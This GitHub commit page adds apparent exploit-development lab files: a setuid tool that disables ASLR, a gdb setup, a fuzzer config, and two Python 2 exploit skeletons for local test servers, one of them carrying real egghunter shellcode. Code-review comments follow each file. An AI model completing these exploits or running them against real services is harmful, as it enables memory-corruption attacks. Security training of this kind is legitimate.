Add files via upload

Omar Santos 2022-02-21 11:25:45 -05:00 committed by GitHub
parent 0940710459
commit f7f9524190
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
8 changed files with 115 additions and 0 deletions

Binary file not shown.


@ -0,0 +1,29 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
FILE *fp;
char buff[100];
if(seteuid(0) == -1) {
fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n");
return -1;
}
if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) {
fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]);
return -1;
}
fp = fopen("/proc/sys/kernel/randomize_va_space", "w");
fprintf(fp, "%s\n", argv[1]);
fclose(fp);
fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
fgets(buff, 99, fp);
fclose(fp);
printf("randomize_va_space is now %s", buff);
return 0;
}
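Review bot: `strcmp` in the argv check is called without `#include <string.h>`; the three includes present (stdio, stdlib, unistd) do not declare it, so the call is an implicit declaration that current compilers reject and older ones accept silently. Both `fopen` calls on `/proc/sys/kernel/randomize_va_space` are also unchecked, so when the sysctl is missing or not writable (the binary run without the setuid bit it tests for, or inside a container that masks `/proc/sys`) the NULL `fp` is dereferenced in `fprintf`/`fgets` instead of failing cleanly; add `if (fp == NULL) { perror("/proc/sys/kernel/randomize_va_space"); return -1; }` after each `fopen`, and check the `fgets` return the same way before `buff` is printed, since `buff` is otherwise uninitialised. Once the write has succeeded the elevated effective UID from `seteuid(0)` is no longer needed; `seteuid(getuid())` before the read-back would keep the rest of `main` unprivileged.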

Binary file not shown.


@ -0,0 +1,4 @@
source /root/s5/archive/peda-master/peda.py
set disassembly-flavor intel
set follow-fork-mode parent
#source /root/.gdbinit-gef.py
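Review bot: `source /root/s5/archive/peda-master/peda.py` hardcodes a machine-specific absolute path, so this gdb init script depends on that exact directory existing on every host it is copied to; a location under `~` or relative to the repository would be portable. The commented-out `#source /root/.gdbinit-gef.py` line below it gives no hint whether it is an alternative to peda or a leftover; either document it (`# alternative front-end: gef, mutually exclusive with peda`) or drop it.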


@ -0,0 +1,13 @@
outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n'
# String to match in the response
inbound '404'
# What port the fuzzer tries to connect to
port 8080
# What protocol to use
proto tcp
# How long to wait on a response
receiveTimeout 1
# How long to wait between retrying test cases
failureTimeout 5
# Number of times to retry a test case
failureThreshold 3
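Review bot: The `outbound fuzz 'POST ...'` line is the only directive in this file without an explanatory comment, while every other setting carries one, and a reader cannot tell from the file whether `fuzz` is a mode keyword or marks the field the fuzzer mutates. A comment above it in the same style as the others, e.g. `# Request template sent to the target ('fuzz' keyword — confirm its meaning against the fuzzer's docs)`, would make the file self-describing; the `inbound '404'` comment could likewise say whether a match counts as success or failure of the test case.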

Binary file not shown.


@ -0,0 +1,26 @@
import socket
import sys
import threading
import struct
IP = "127.0.0.1"
PORT=8080
jmpesp = ????
offset = ????
buf = ????
payload = ????
payload = "POST %s\r\n\r\n" % payload
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(2)
sock.connect((IP,PORT))
sock.send(payload)
print "Buffer sent! (len %d)" % len(payload)
try:
print sock.recv(4096)
print "No crash...."
except:
print "Server died, Yayyyy!!"
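Review bot: The bare `except:` around `sock.recv` prints `Server died` for any exception at all, including the `socket.timeout` that `sock.settimeout(2)` makes likely when the service is merely slow, and it also swallows `KeyboardInterrupt`, so the diagnostic does not actually distinguish a crashed server from an unresponsive one. Narrow it to `except socket.timeout: print "No response within 2s (server may still be up)"` and `except socket.error as e: print "Connection error: %s" % e`, and close the socket on both paths — `sock` is never closed in this file. `sys`, `threading` and `struct` are imported but unused here.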


@ -0,0 +1,43 @@
#!/usr/bin/python
import os
import socket
import sys
import threading
import struct
import time
HOST="127.0.0.1"
PORT=2501
# Matt Miller Access() egghunter, triggers on "W00TW00T"
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
egghunterPayload = ?
msgPayload = ?
# Connect one user
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect((HOST, PORT))
sock1.send("usr1\r\n")
sock1.recv(1024)
print "Connected first user"
# Connect a second user and message the first with the egg
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2.connect((HOST, PORT))
sock2.send("usr2\r\n")
sock2.recv(1024)
time.sleep(1)
print "Connected second user"
sock2.send(msgPayload)
print "Sent msg payload"
# Connect a final user to trigger egghunter in username
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock3.connect((HOST, PORT))
sock3.send(egghunterPayload)
print "Sent egghunter payload"
# Close down
sock3.close()
sock2.close()
sock1.close()
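Review bot: The three sockets are opened with no `try`/`finally`, so an exception from `sock2.connect`, `sock3.connect` or either `send` skips the three `close()` calls at the end and leaves the earlier connections open until the interpreter exits; moving the `close()` calls into a `finally:` block makes the cleanup unconditional (these are Python 2 socket objects, which do not support `with`). `os`, `sys`, `threading` and `struct` are imported but never used. The file is Python 2 (`print` statements, `str` payloads passed to `send`) while its shebang is `#!/usr/bin/python`, which on current distributions resolves to Python 3 or to nothing; `#!/usr/bin/env python2` states the real requirement. The two `recv(1024)` results are discarded — if they exist only to drain the server's greeting, a `# drain greeting` comment would say so.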